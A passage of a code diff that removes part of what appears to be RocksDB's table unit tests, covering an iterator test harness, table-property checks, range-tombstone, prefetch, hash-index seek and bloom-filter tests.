-    constructor_ = nullptr;
-    options_ = Options();
-    options_.compression = args.compression;
-    // Use shorter block size for tests to exercise block boundary
-    // conditions more.
-    if (args.reverse_compare) {
-      options_.comparator = &reverse_key_comparator;
-    }
-
-    internal_comparator_.reset(
-        new test::PlainInternalKeyComparator(options_.comparator));
-
-    support_prev_ = true;
-    only_support_prefix_seek_ = false;
-    options_.allow_mmap_reads = args.use_mmap;
-    switch (args.type) {
-      case BLOCK_BASED_TABLE_TEST:
-        table_options_.flush_block_policy_factory.reset(
-            new FlushBlockBySizePolicyFactory());
-        table_options_.block_size = 256;
-        table_options_.block_restart_interval = args.restart_interval;
-        table_options_.index_block_restart_interval = args.restart_interval;
-        table_options_.format_version = args.format_version;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-// Plain table is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-      case PLAIN_TABLE_SEMI_FIXED_PREFIX:
-        support_prev_ = false;
-        only_support_prefix_seek_ = true;
-        options_.prefix_extractor.reset(new FixedOrLessPrefixTransform(2));
-        options_.table_factory.reset(NewPlainTableFactory());
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-      case PLAIN_TABLE_FULL_STR_PREFIX:
-        support_prev_ = false;
-        only_support_prefix_seek_ = true;
-        options_.prefix_extractor.reset(NewNoopTransform());
-        options_.table_factory.reset(NewPlainTableFactory());
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-      case PLAIN_TABLE_TOTAL_ORDER:
-        support_prev_ = false;
-        only_support_prefix_seek_ = false;
-        options_.prefix_extractor = nullptr;
-
-        {
-          PlainTableOptions plain_table_options;
-          plain_table_options.user_key_len = kPlainTableVariableLength;
-          plain_table_options.bloom_bits_per_key = 0;
-          plain_table_options.hash_table_ratio = 0;
-
-          options_.table_factory.reset(
-              NewPlainTableFactory(plain_table_options));
-        }
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-#endif  // !ROCKSDB_LITE
-      case BLOCK_TEST:
-        table_options_.block_size = 256;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new BlockConstructor(options_.comparator);
-        break;
-      case MEMTABLE_TEST:
-        table_options_.block_size = 256;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new MemTableConstructor(options_.comparator,
-                                               &write_buffer_);
-        break;
-      case DB_TEST:
-        table_options_.block_size = 256;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new DBConstructor(options_.comparator);
-        break;
-    }
-    ioptions_ = ImmutableCFOptions(options_);
-  }
-
-  ~HarnessTest() { delete constructor_; }
-
-  void Add(const std::string& key, const std::string& value) {
-    constructor_->Add(key, value);
-  }
-
-  void Test(Random* rnd) {
-    std::vector<std::string> keys;
-    stl_wrappers::KVMap data;
-    constructor_->Finish(options_, ioptions_, table_options_,
-                         *internal_comparator_, &keys, &data);
-
-    TestForwardScan(keys, data);
-    if (support_prev_) {
-      TestBackwardScan(keys, data);
-    }
-    TestRandomAccess(rnd, keys, data);
-  }
-
-  void TestForwardScan(const std::vector<std::string>& keys,
-                       const stl_wrappers::KVMap& data) {
-    InternalIterator* iter = constructor_->NewIterator();
-    ASSERT_TRUE(!iter->Valid());
-    iter->SeekToFirst();
-    for (stl_wrappers::KVMap::const_iterator model_iter = data.begin();
-         model_iter != data.end(); ++model_iter) {
-      ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-      iter->Next();
-    }
-    ASSERT_TRUE(!iter->Valid());
-    if (constructor_->IsArenaMode() && !constructor_->AnywayDeleteIterator()) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-
-  void TestBackwardScan(const std::vector<std::string>& keys,
-                        const stl_wrappers::KVMap& data) {
-    InternalIterator* iter = constructor_->NewIterator();
-    ASSERT_TRUE(!iter->Valid());
-    iter->SeekToLast();
-    for (stl_wrappers::KVMap::const_reverse_iterator model_iter = data.rbegin();
-         model_iter != data.rend(); ++model_iter) {
-      ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-      iter->Prev();
-    }
-    ASSERT_TRUE(!iter->Valid());
-    if (constructor_->IsArenaMode() && !constructor_->AnywayDeleteIterator()) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-
-  void TestRandomAccess(Random* rnd, const std::vector<std::string>& keys,
-                        const stl_wrappers::KVMap& data) {
-    static const bool kVerbose = false;
-    InternalIterator* iter = constructor_->NewIterator();
-    ASSERT_TRUE(!iter->Valid());
-    stl_wrappers::KVMap::const_iterator model_iter = data.begin();
-    if (kVerbose) fprintf(stderr, "---\n");
-    for (int i = 0; i < 200; i++) {
-      const int toss = rnd->Uniform(support_prev_ ? 5 : 3);
-      switch (toss) {
-        case 0: {
-          if (iter->Valid()) {
-            if (kVerbose) fprintf(stderr, "Next\n");
-            iter->Next();
-            ++model_iter;
-            ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          }
-          break;
-        }
-
-        case 1: {
-          if (kVerbose) fprintf(stderr, "SeekToFirst\n");
-          iter->SeekToFirst();
-          model_iter = data.begin();
-          ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          break;
-        }
-
-        case 2: {
-          std::string key = PickRandomKey(rnd, keys);
-          model_iter = data.lower_bound(key);
-          if (kVerbose) fprintf(stderr, "Seek '%s'\n",
-                                EscapeString(key).c_str());
-          iter->Seek(Slice(key));
-          ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          break;
-        }
-
-        case 3: {
-          if (iter->Valid()) {
-            if (kVerbose) fprintf(stderr, "Prev\n");
-            iter->Prev();
-            if (model_iter == data.begin()) {
-              model_iter = data.end();   // Wrap around to invalid value
-            } else {
-              --model_iter;
-            }
-            ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          }
-          break;
-        }
-
-        case 4: {
-          if (kVerbose) fprintf(stderr, "SeekToLast\n");
-          iter->SeekToLast();
-          if (keys.empty()) {
-            model_iter = data.end();
-          } else {
-            std::string last = data.rbegin()->first;
-            model_iter = data.lower_bound(last);
-          }
-          ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          break;
-        }
-      }
-    }
-    if (constructor_->IsArenaMode() && !constructor_->AnywayDeleteIterator()) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-
-  std::string ToString(const stl_wrappers::KVMap& data,
-                       const stl_wrappers::KVMap::const_iterator& it) {
-    if (it == data.end()) {
-      return "END";
-    } else {
-      return "'" + it->first + "->" + it->second + "'";
-    }
-  }
-
-  std::string ToString(const stl_wrappers::KVMap& data,
-                       const stl_wrappers::KVMap::const_reverse_iterator& it) {
-    if (it == data.rend()) {
-      return "END";
-    } else {
-      return "'" + it->first + "->" + it->second + "'";
-    }
-  }
-
-  std::string ToString(const InternalIterator* it) {
-    if (!it->Valid()) {
-      return "END";
-    } else {
-      return "'" + it->key().ToString() + "->" + it->value().ToString() + "'";
-    }
-  }
-
-  std::string PickRandomKey(Random* rnd, const std::vector<std::string>& keys) {
-    if (keys.empty()) {
-      return "foo";
-    } else {
-      const int index = rnd->Uniform(static_cast<int>(keys.size()));
-      std::string result = keys[index];
-      switch (rnd->Uniform(support_prev_ ? 3 : 1)) {
-        case 0:
-          // Return an existing key
-          break;
-        case 1: {
-          // Attempt to return something smaller than an existing key
-          if (result.size() > 0 && result[result.size() - 1] > '\0'
-              && (!only_support_prefix_seek_
-                  || options_.prefix_extractor->Transform(result).size()
-                  < result.size())) {
-            result[result.size() - 1]--;
-          }
-          break;
-      }
-        case 2: {
-          // Return something larger than an existing key
-          Increment(options_.comparator, &result);
-          break;
-        }
-      }
-      return result;
-    }
-  }
-
-  // Returns nullptr if not running against a DB
-  DB* db() const { return constructor_->db(); }
-
- private:
-  Options options_ = Options();
-  ImmutableCFOptions ioptions_;
-  BlockBasedTableOptions table_options_ = BlockBasedTableOptions();
-  Constructor* constructor_;
-  WriteBufferManager write_buffer_;
-  bool support_prev_;
-  bool only_support_prefix_seek_;
-  shared_ptr<InternalKeyComparator> internal_comparator_;
-};
-
-static bool Between(uint64_t val, uint64_t low, uint64_t high) {
-  bool result = (val >= low) && (val <= high);
-  if (!result) {
-    fprintf(stderr, "Value %llu is not in range [%llu, %llu]\n",
-            (unsigned long long)(val),
-            (unsigned long long)(low),
-            (unsigned long long)(high));
-  }
-  return result;
-}
-
-// Tests against all kinds of tables
-class TableTest : public testing::Test {
- public:
-  const InternalKeyComparator& GetPlainInternalComparator(
-      const Comparator* comp) {
-    if (!plain_internal_comparator) {
-      plain_internal_comparator.reset(
-          new test::PlainInternalKeyComparator(comp));
-    }
-    return *plain_internal_comparator;
-  }
-  void IndexTest(BlockBasedTableOptions table_options);
-
- private:
-  std::unique_ptr<InternalKeyComparator> plain_internal_comparator;
-};
-
-class GeneralTableTest : public TableTest {};
-class BlockBasedTableTest : public TableTest {};
-class PlainTableTest : public TableTest {};
-class TablePropertyTest : public testing::Test {};
-
-// This test serves as the living tutorial for the prefix scan of user collected
-// properties.
-TEST_F(TablePropertyTest, PrefixScanTest) {
-  UserCollectedProperties props{{"num.111.1", "1"},
-                                {"num.111.2", "2"},
-                                {"num.111.3", "3"},
-                                {"num.333.1", "1"},
-                                {"num.333.2", "2"},
-                                {"num.333.3", "3"},
-                                {"num.555.1", "1"},
-                                {"num.555.2", "2"},
-                                {"num.555.3", "3"}, };
-
-  // prefixes that exist
-  for (const std::string& prefix : {"num.111", "num.333", "num.555"}) {
-    int num = 0;
-    for (auto pos = props.lower_bound(prefix);
-         pos != props.end() &&
-             pos->first.compare(0, prefix.size(), prefix) == 0;
-         ++pos) {
-      ++num;
-      auto key = prefix + "." + ToString(num);
-      ASSERT_EQ(key, pos->first);
-      ASSERT_EQ(ToString(num), pos->second);
-    }
-    ASSERT_EQ(3, num);
-  }
-
-  // prefixes that don't exist
-  for (const std::string& prefix :
-       {"num.000", "num.222", "num.444", "num.666"}) {
-    auto pos = props.lower_bound(prefix);
-    ASSERT_TRUE(pos == props.end() ||
-                pos->first.compare(0, prefix.size(), prefix) != 0);
-  }
-}
-
-// This test include all the basic checks except those for index size and block
-// size, which will be conducted in separated unit tests.
-TEST_F(BlockBasedTableTest, BasicBlockBasedTableProperties) {
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-
-  c.Add("a1", "val1");
-  c.Add("b2", "val2");
-  c.Add("c3", "val3");
-  c.Add("d4", "val4");
-  c.Add("e5", "val5");
-  c.Add("f6", "val6");
-  c.Add("g7", "val7");
-  c.Add("h8", "val8");
-  c.Add("j9", "val9");
-  uint64_t diff_internal_user_bytes = 9 * 8;  // 8 is seq size, 9 k-v totally
-
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = 1;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-  auto& props = *c.GetTableReader()->GetTableProperties();
-  ASSERT_EQ(kvmap.size(), props.num_entries);
-
-  auto raw_key_size = kvmap.size() * 2ul;
-  auto raw_value_size = kvmap.size() * 4ul;
-
-  ASSERT_EQ(raw_key_size + diff_internal_user_bytes, props.raw_key_size);
-  ASSERT_EQ(raw_value_size, props.raw_value_size);
-  ASSERT_EQ(1ul, props.num_data_blocks);
-  ASSERT_EQ("", props.filter_policy_name);  // no filter policy is used
-
-  // Verify data size.
-  BlockBuilder block_builder(1);
-  for (const auto& item : kvmap) {
-    block_builder.Add(item.first, item.second);
-  }
-  Slice content = block_builder.Finish();
-  ASSERT_EQ(content.size() + kBlockTrailerSize + diff_internal_user_bytes,
-            props.data_size);
-  c.ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, BlockBasedTableProperties2) {
-  TableConstructor c(&reverse_key_comparator);
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-
-  {
-    Options options;
-    options.compression = CompressionType::kNoCompression;
-    BlockBasedTableOptions table_options;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-    auto& props = *c.GetTableReader()->GetTableProperties();
-
-    // Default comparator
-    ASSERT_EQ("leveldb.BytewiseComparator", props.comparator_name);
-    // No merge operator
-    ASSERT_EQ("nullptr", props.merge_operator_name);
-    // No prefix extractor
-    ASSERT_EQ("nullptr", props.prefix_extractor_name);
-    // No property collectors
-    ASSERT_EQ("[]", props.property_collectors_names);
-    // No filter policy is used
-    ASSERT_EQ("", props.filter_policy_name);
-    // Compression type == that set:
-    ASSERT_EQ("NoCompression", props.compression_name);
-    c.ResetTableReader();
-  }
-
-  {
-    Options options;
-    BlockBasedTableOptions table_options;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    options.comparator = &reverse_key_comparator;
-    options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-    options.prefix_extractor.reset(NewNoopTransform());
-    options.table_properties_collector_factories.emplace_back(
-        new DummyPropertiesCollectorFactory1());
-    options.table_properties_collector_factories.emplace_back(
-        new DummyPropertiesCollectorFactory2());
-
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-    auto& props = *c.GetTableReader()->GetTableProperties();
-
-    ASSERT_EQ("rocksdb.ReverseBytewiseComparator", props.comparator_name);
-    ASSERT_EQ("UInt64AddOperator", props.merge_operator_name);
-    ASSERT_EQ("rocksdb.Noop", props.prefix_extractor_name);
-    ASSERT_EQ("[DummyPropertiesCollector1,DummyPropertiesCollector2]",
-              props.property_collectors_names);
-    ASSERT_EQ("", props.filter_policy_name);  // no filter policy is used
-    c.ResetTableReader();
-  }
-}
-
-TEST_F(BlockBasedTableTest, RangeDelBlock) {
-  TableConstructor c(BytewiseComparator());
-  std::vector<std::string> keys = {"1pika", "2chu"};
-  std::vector<std::string> vals = {"p", "c"};
-
-  for (int i = 0; i < 2; i++) {
-    RangeTombstone t(keys[i], vals[i], i);
-    std::pair<InternalKey, Slice> p = t.Serialize();
-    c.Add(p.first.Encode().ToString(), p.second);
-  }
-
-  std::vector<std::string> sorted_keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = 1;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  const ImmutableCFOptions ioptions(options);
-  std::unique_ptr<InternalKeyComparator> internal_cmp(
-      new InternalKeyComparator(options.comparator));
-  c.Finish(options, ioptions, table_options, *internal_cmp, &sorted_keys,
-           &kvmap);
-
-  for (int j = 0; j < 2; ++j) {
-    std::unique_ptr<InternalIterator> iter(
-        c.GetTableReader()->NewRangeTombstoneIterator(ReadOptions()));
-    if (j > 0) {
-      // For second iteration, delete the table reader object and verify the
-      // iterator can still access its metablock's range tombstones.
-      c.ResetTableReader();
-    }
-    ASSERT_FALSE(iter->Valid());
-    iter->SeekToFirst();
-    ASSERT_TRUE(iter->Valid());
-    for (int i = 0; i < 2; i++) {
-      ASSERT_TRUE(iter->Valid());
-      ParsedInternalKey parsed_key;
-      ASSERT_TRUE(ParseInternalKey(iter->key(), &parsed_key));
-      RangeTombstone t(parsed_key, iter->value());
-      ASSERT_EQ(t.start_key_, keys[i]);
-      ASSERT_EQ(t.end_key_, vals[i]);
-      ASSERT_EQ(t.seq_, i);
-      iter->Next();
-    }
-    ASSERT_TRUE(!iter->Valid());
-  }
-}
-
-TEST_F(BlockBasedTableTest, FilterPolicyNameProperties) {
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("a1", "val1");
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  Options options;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-  auto& props = *c.GetTableReader()->GetTableProperties();
-  ASSERT_EQ("rocksdb.BuiltinBloomFilter", props.filter_policy_name);
-  c.ResetTableReader();
-}
-
-//
-// BlockBasedTableTest::PrefetchTest
-//
-void AssertKeysInCache(BlockBasedTable* table_reader,
-                       const std::vector<std::string>& keys_in_cache,
-                       const std::vector<std::string>& keys_not_in_cache,
-                       bool convert = false) {
-  if (convert) {
-    for (auto key : keys_in_cache) {
-      InternalKey ikey(key, kMaxSequenceNumber, kTypeValue);
-      ASSERT_TRUE(table_reader->TEST_KeyInCache(ReadOptions(), ikey.Encode()));
-    }
-    for (auto key : keys_not_in_cache) {
-      InternalKey ikey(key, kMaxSequenceNumber, kTypeValue);
-      ASSERT_TRUE(!table_reader->TEST_KeyInCache(ReadOptions(), ikey.Encode()));
-    }
-  } else {
-    for (auto key : keys_in_cache) {
-      ASSERT_TRUE(table_reader->TEST_KeyInCache(ReadOptions(), key));
-    }
-    for (auto key : keys_not_in_cache) {
-      ASSERT_TRUE(!table_reader->TEST_KeyInCache(ReadOptions(), key));
-    }
-  }
-}
-
-void PrefetchRange(TableConstructor* c, Options* opt,
-                   BlockBasedTableOptions* table_options, const char* key_begin,
-                   const char* key_end,
-                   const std::vector<std::string>& keys_in_cache,
-                   const std::vector<std::string>& keys_not_in_cache,
-                   const Status expected_status = Status::OK()) {
-  // reset the cache and reopen the table
-  table_options->block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt->table_factory.reset(NewBlockBasedTableFactory(*table_options));
-  const ImmutableCFOptions ioptions2(*opt);
-  ASSERT_OK(c->Reopen(ioptions2));
-
-  // prefetch
-  auto* table_reader = dynamic_cast<BlockBasedTable*>(c->GetTableReader());
-  Status s;
-  unique_ptr<Slice> begin, end;
-  unique_ptr<InternalKey> i_begin, i_end;
-  if (key_begin != nullptr) {
-    if (c->ConvertToInternalKey()) {
-      i_begin.reset(new InternalKey(key_begin, kMaxSequenceNumber, kTypeValue));
-      begin.reset(new Slice(i_begin->Encode()));
-    } else {
-      begin.reset(new Slice(key_begin));
-    }
-  }
-  if (key_end != nullptr) {
-    if (c->ConvertToInternalKey()) {
-      i_end.reset(new InternalKey(key_end, kMaxSequenceNumber, kTypeValue));
-      end.reset(new Slice(i_end->Encode()));
-    } else {
-      end.reset(new Slice(key_end));
-    }
-  }
-  s = table_reader->Prefetch(begin.get(), end.get());
-
-  ASSERT_TRUE(s.code() == expected_status.code());
-
-  // assert our expectation in cache warmup
-  AssertKeysInCache(table_reader, keys_in_cache, keys_not_in_cache,
-                    c->ConvertToInternalKey());
-  c->ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, PrefetchTest) {
-  // The purpose of this test is to test the prefetching operation built into
-  // BlockBasedTable.
-  Options opt;
-  unique_ptr<InternalKeyComparator> ikc;
-  ikc.reset(new test::PlainInternalKeyComparator(opt.comparator));
-  opt.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  // big enough so we don't ever lose cached values.
-  table_options.block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("k01", "hello");
-  c.Add("k02", "hello2");
-  c.Add("k03", std::string(10000, 'x'));
-  c.Add("k04", std::string(200000, 'x'));
-  c.Add("k05", std::string(300000, 'x'));
-  c.Add("k06", "hello3");
-  c.Add("k07", std::string(100000, 'x'));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(opt);
-  c.Finish(opt, ioptions, table_options, *ikc, &keys, &kvmap);
-  c.ResetTableReader();
-
-  // We get the following data spread :
-  //
-  // Data block         Index
-  // ========================
-  // [ k01 k02 k03 ]    k03
-  // [ k04         ]    k04
-  // [ k05         ]    k05
-  // [ k06 k07     ]    k07
-
-
-  // Simple
-  PrefetchRange(&c, &opt, &table_options,
-                /*key_range=*/"k01", "k05",
-                /*keys_in_cache=*/{"k01", "k02", "k03", "k04", "k05"},
-                /*keys_not_in_cache=*/{"k06", "k07"});
-  PrefetchRange(&c, &opt, &table_options, "k01", "k01", {"k01", "k02", "k03"},
-                {"k04", "k05", "k06", "k07"});
-  // odd
-  PrefetchRange(&c, &opt, &table_options, "a", "z",
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  PrefetchRange(&c, &opt, &table_options, "k00", "k00", {"k01", "k02", "k03"},
-                {"k04", "k05", "k06", "k07"});
-  // Edge cases
-  PrefetchRange(&c, &opt, &table_options, "k00", "k06",
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  PrefetchRange(&c, &opt, &table_options, "k00", "zzz",
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  // null keys
-  PrefetchRange(&c, &opt, &table_options, nullptr, nullptr,
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  PrefetchRange(&c, &opt, &table_options, "k04", nullptr,
-                {"k04", "k05", "k06", "k07"}, {"k01", "k02", "k03"});
-  PrefetchRange(&c, &opt, &table_options, nullptr, "k05",
-                {"k01", "k02", "k03", "k04", "k05"}, {"k06", "k07"});
-  // invalid
-  PrefetchRange(&c, &opt, &table_options, "k06", "k00", {}, {},
-                Status::InvalidArgument(Slice("k06 "), Slice("k07")));
-  c.ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, TotalOrderSeekOnHashIndex) {
-  BlockBasedTableOptions table_options;
-  for (int i = 0; i < 4; ++i) {
-    Options options;
-    // Make each key/value an individual block
-    table_options.block_size = 64;
-    switch (i) {
-    case 0:
-      // Binary search index
-      table_options.index_type = BlockBasedTableOptions::kBinarySearch;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      break;
-    case 1:
-      // Hash search index
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      options.prefix_extractor.reset(NewFixedPrefixTransform(4));
-      break;
-    case 2:
-      // Hash search index with hash_index_allow_collision
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      table_options.hash_index_allow_collision = true;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      options.prefix_extractor.reset(NewFixedPrefixTransform(4));
-      break;
-    case 3:
-      // Hash search index with filter policy
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      options.prefix_extractor.reset(NewFixedPrefixTransform(4));
-      break;
-    case 4:
-    default:
-      // Binary search index
-      table_options.index_type = BlockBasedTableOptions::kTwoLevelIndexSearch;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      break;
-    }
-
-    TableConstructor c(BytewiseComparator(),
-                       true /* convert_to_internal_key_ */);
-    c.Add("aaaa1", std::string('a', 56));
-    c.Add("bbaa1", std::string('a', 56));
-    c.Add("cccc1", std::string('a', 56));
-    c.Add("bbbb1", std::string('a', 56));
-    c.Add("baaa1", std::string('a', 56));
-    c.Add("abbb1", std::string('a', 56));
-    c.Add("cccc2", std::string('a', 56));
-    std::vector<std::string> keys;
-    stl_wrappers::KVMap kvmap;
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-    auto props = c.GetTableReader()->GetTableProperties();
-    ASSERT_EQ(7u, props->num_data_blocks);
-    auto* reader = c.GetTableReader();
-    ReadOptions ro;
-    ro.total_order_seek = true;
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-
-    iter->Seek(InternalKey("b", 0, kTypeValue).Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("baaa1", ExtractUserKey(iter->key()).ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbaa1", ExtractUserKey(iter->key()).ToString());
-
-    iter->Seek(InternalKey("bb", 0, kTypeValue).Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbaa1", ExtractUserKey(iter->key()).ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbbb1", ExtractUserKey(iter->key()).ToString());
-
-    iter->Seek(InternalKey("bbb", 0, kTypeValue).Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbbb1", ExtractUserKey(iter->key()).ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("cccc1", ExtractUserKey(iter->key()).ToString());
-  }
-}
-
-TEST_F(BlockBasedTableTest, NoopTransformSeek) {
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-
-  Options options;
-  options.comparator = BytewiseComparator();
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewNoopTransform());
-
-  TableConstructor c(options.comparator);
-  // To tickle the PrefixMayMatch bug it is important that the
-  // user-key is a single byte so that the index key exactly matches
-  // the user-key.
-  InternalKey key("a", 1, kTypeValue);
-  c.Add(key.Encode().ToString(), "b");
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(options);
-  const InternalKeyComparator internal_comparator(options.comparator);
-  c.Finish(options, ioptions, table_options, internal_comparator, &keys,
-           &kvmap);
-
-  auto* reader = c.GetTableReader();
-  for (int i = 0; i < 2; ++i) {
-    ReadOptions ro;
-    ro.total_order_seek = (i == 0);
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-
-    iter->Seek(key.Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a", ExtractUserKey(iter->key()).ToString());
-  }
-}
-
-TEST_F(BlockBasedTableTest, SkipPrefixBloomFilter) {
-  // if DB is opened with a prefix extractor of a different name,
-  // prefix bloom is skipped when read the file
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(2));
-  table_options.whole_key_filtering = false;
-
-  Options options;
-  options.comparator = BytewiseComparator();
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-
-  TableConstructor c(options.comparator);
-  InternalKey key("abcdefghijk", 1, kTypeValue);
-  c.Add(key.Encode().ToString(), "test");
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(options);
-  const InternalKeyComparator internal_comparator(options.comparator);
-  c.Finish(options, ioptions, table_options, internal_comparator, &keys,
-           &kvmap);
-  options.prefix_extractor.reset(NewFixedPrefixTransform(9));
-  const ImmutableCFOptions new_ioptions(options);
-  c.Reopen(new_ioptions);
-  auto reader = c.GetTableReader();
-  std::unique_ptr<InternalIterator> db_iter(reader->NewIterator(ReadOptions()));
-
-  // Test point lookup
-  // only one kv
-  for (auto& kv : kvmap) {
-    db_iter->Seek(kv.first);
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    ASSERT_EQ(db_iter->key(), kv.first);
-    ASSERT_EQ(db_iter->value(), kv.second);
-  }
-}
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-
-void AddInternalKey(TableConstructor* c, const std::string& prefix,
-                    int suffix_len = 800) {
-  static Random rnd(1023);
-  InternalKey k(prefix + RandomString(&rnd, 800), 0, kTypeValue);
-  c->Add(k.Encode().ToString(), "v");
-}
-
-void TableTest::IndexTest(BlockBasedTableOptions table_options) {
-  TableConstructor c(BytewiseComparator());
-
-  // keys with prefix length 3, make sure the key/value is big enough to fill
-  // one block
-  AddInternalKey(&c, "0015");
-  AddInternalKey(&c, "0035");
-
-  AddInternalKey(&c, "0054");
-  AddInternalKey(&c, "0055");
-
-  AddInternalKey(&c, "0056");
-  AddInternalKey(&c, "0057");
-
-  AddInternalKey(&c, "0058");
-  AddInternalKey(&c, "0075");
-
-  AddInternalKey(&c, "0076");
-  AddInternalKey(&c, "0095");
-
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-  table_options.block_size = 1700;
-  table_options.block_cache = NewLRUCache(1024, 4);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  std::unique_ptr<InternalKeyComparator> comparator(
-      new InternalKeyComparator(BytewiseComparator()));
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, *comparator, &keys, &kvmap);
-  auto reader = c.GetTableReader();
-
